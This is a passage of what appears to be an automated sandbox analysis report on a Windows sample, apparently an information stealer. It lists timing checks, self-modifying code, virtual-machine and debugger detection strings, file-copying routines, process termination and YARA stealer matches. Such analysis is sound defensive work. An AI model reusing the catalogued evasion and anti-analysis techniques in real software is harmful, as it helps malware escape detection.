              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F86E5 second address: 12F871D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6778CEBE59h 0x00000009 jmp 00007F6778CEBE56h 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F8409 second address: 12F840F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1309971 second address: 1309977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13097F0 second address: 13097F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132BCC8 second address: 132BCCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132BCCC second address: 132BCD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132BCD0 second address: 132BCEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6778CEBE55h 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C502 second address: 132C506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C506 second address: 132C50A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C50A second address: 132C510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C510 second address: 132C522 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6778CEBE4Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132C522 second address: 132C542 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop ebx 0x00000014 jno 00007F67787C018Ch 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132F83F second address: 132F844 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132F8FE second address: 132F904 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132F904 second address: 132F918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F6778CEBE46h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132F918 second address: 132F91C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132F91C second address: 132F932 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132FBCA second address: 132FBD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1330D36 second address: 1330D4A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jl 00007F6778CEBE50h 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334217 second address: 133421B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133421B second address: 1334251 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6778CEBE51h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jg 00007F6778CEBE46h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F6778CEBE55h 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334251 second address: 1334256 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1334256 second address: 1334263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jl 00007F6778CEBE4Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0318 second address: 55F032A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F67787C018Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F03E6 second address: 55F0406 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0406 second address: 55F040C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F040C second address: 55F0479 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c mov ah, F2h 0x0000000e pushfd 0x0000000f jmp 00007F6778CEBE4Fh 0x00000014 and ch, FFFFFF8Eh 0x00000017 jmp 00007F6778CEBE59h 0x0000001c popfd 0x0000001d popad 0x0000001e mov di, ax 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F6778CEBE59h 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1249E27 second address: 1249E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1249FDE second address: 1249FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1249FE2 second address: 1249FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1249FEC second address: 1249FFE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F6778CEBE46h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1249FFE second address: 124A008 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 108FA62 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 123D515 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 12697D9 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 124ED80 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 12CD573 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_1-27376
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_1-26194
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.7 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E518A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00E518A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E53910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00E53910
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E51269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00E51269
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E51250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00E51250
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E5E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00E5E210
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E5CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00E5CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E523A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00E523A9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E4DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00E4DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E52390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,1_2_00E52390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E4DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00E4DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E54B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00E54B29
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E54B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00E54B10
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E5DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,1_2_00E5DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E5D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00E5D530
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E416A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00E416A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E416B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00E416B9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E61BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,1_2_00E61BF0
Source: file.exe, file.exe, 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000001.00000002.1389080982.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1389080982.0000000001726000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware+
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_1-26033
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_1-26180
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_1-26189
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_1-26077
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_1-26052
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

              Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E44A60 VirtualProtect 00000000,00000004,00000100,? 1_2_00E44A60
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E66390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00E66390
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E66390 mov eax, dword ptr fs:[00000030h] 1_2_00E66390
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E62AD0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,1_2_00E62AD0
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 7468, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E646A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,1_2_00E646A0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E64610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,1_2_00E64610
Source: file.exe, file.exe, 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: G[Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00E62D60
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E62B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,1_2_00E62B60
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E62A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,1_2_00E62A40
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E62C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,1_2_00E62C10

              Stealing of Sensitive Information

Source: Yara match | File source: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1332375323.0000000005490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7468, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

              Remote Access Functionality

